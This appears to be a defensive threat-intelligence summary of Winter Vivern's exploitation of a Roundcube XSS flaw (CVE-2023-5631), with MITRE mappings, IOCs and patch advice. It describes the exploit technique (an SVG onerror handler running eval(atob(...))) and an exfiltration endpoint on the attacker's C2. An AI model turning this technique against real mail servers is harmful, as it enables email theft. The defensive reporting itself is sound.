Keypoints
- Winter Vivern exploited a zero‑day XSS in Roundcube’s rcube_washtml.php to inject JavaScript via a crafted email.
- The malicious email contained an SVG with a base64 payload that used an onerror handler to execute eval(atob(…)).
- The injected JavaScript added a script element that loaded a loader (checkupdate.js) from recsecas[.]com, the C2.
- The final payload enumerated folders and emails and exfiltrated messages to https://recsecas[.]com/controlserver/saveMessage over HTTPS.
- Affected Roundcube versions: 1.6.x before 1.6.4, 1.5.x before 1.5.5, and 1.4.x before 1.4.15; fixes were released on 2023-10-14/16.
- IOCs include the loader filename checkupdate.js and two SHA‑1 hashes, the domain recsecas[.]com (38.180.76[.]31), and the sender team.managment@outlook[.]com.
MITRE Techniques
- [T1583.001] Acquire Infrastructure: Domains – Winter Vivern operators bought domains used for C2 (‘Winter Vivern operators bought a domain at Registrar.eu.’)
- [T1583.004] Acquire Infrastructure: Server – Operators rented servers to host C2 infrastructure (‘Winter Vivern operators rented a server at M247.’)
- [T1587.004] Develop Capabilities: Exploits – The group developed or used an exploit for Roundcube (‘Winter Vivern operators probably developed an exploit for Roundcube.’)
- [T1190] Exploit Public-Facing Application – The attack exploited a Roundcube XSS via a crafted email (‘Winter Vivern sent an email exploiting CVE‑2023-5631 in Roundcube.’)
- [T1566] Phishing – The XSS was delivered through a phishing-style email that must be viewed in Roundcube (‘The vulnerability is triggered via a phishing email, which should be opened in the Roundcube webmail by the victim.’)
- [T1203] Exploitation for Client Execution – The XSS causes execution of attacker JavaScript in the client browser (‘The JavaScript payload is executed by an XSS vulnerability in Roundcube.’)
- [T1087.003] Account Discovery: Email Account – The payload enumerates email folders/accounts (‘The JavaScript payload can list folders in the email account.’)
- [T1114.002] Email Collection: Remote Email Collection – The payload collects and exfiltrates email messages from the account (‘The JavaScript payload can exfiltrate emails from the Roundcube account.’)
- [T1071.001] Application Layer Protocol: Web Protocols – C2 and exfiltration use HTTPS (‘C&C communications use HTTPs.’)
- [T1041] Exfiltration Over C2 Channel – Exfiltration is performed to the attacker C2 server over HTTPS (‘Exfiltration is done via HTTPs and to the same C&C server.’)
Indicators of Compromise
- [Files] JavaScript payloads – checkupdate.js (SHA-1: 97ED594EF2B5755F0549C6C5758377C0B87CFAE0), final payload (SHA-1: 8BF7FCC70F6CE032217D9210EF30314DDD6B8135)
- [Network] C2 domain and IP – recsecas[.]com, 38.180.76[.]31 (C2 server, hosted at M247 Europe SRL)
- [Email addresses] Phishing sender – team.managment@outlook[.]com (used to deliver the malicious message)
Attack chain and exploitation: The attackers sent a seemingly benign email (subject “Get started in your Outlook”) containing an SVG element whose tag had an invalid href and an onerror attribute with a base64‑encoded payload. When Roundcube rendered the message, the server-side script rcube_washtml.php failed to sanitize the SVG, allowing the onerror handler to run eval(atob(…)) in the context of the user’s browser and inject a script element pointing to the attacker C2.
Loader and payload behavior: The injected code dynamically appended a script whose src loaded checkupdate.js from recsecas[.]com; that loader then fetched the final obfuscated JavaScript. The final payload enumerated folders and emails in the logged‑in Roundcube account and exfiltrated message data by POSTing to https://recsecas[.]com/controlserver/saveMessage over HTTPS, enabling remote email collection with only the victim viewing the message in their browser.
Mitigation and affected versions: The vulnerability was assigned CVE-2023-5631 and patched in Roundcube releases 1.6.4, 1.5.5, and 1.4.15; administrators should update immediately, block or monitor connections to recsecas[.]com / 38.180.76[.]31, and search for the listed SHA‑1s and the filename checkupdate.js in logs and webroots.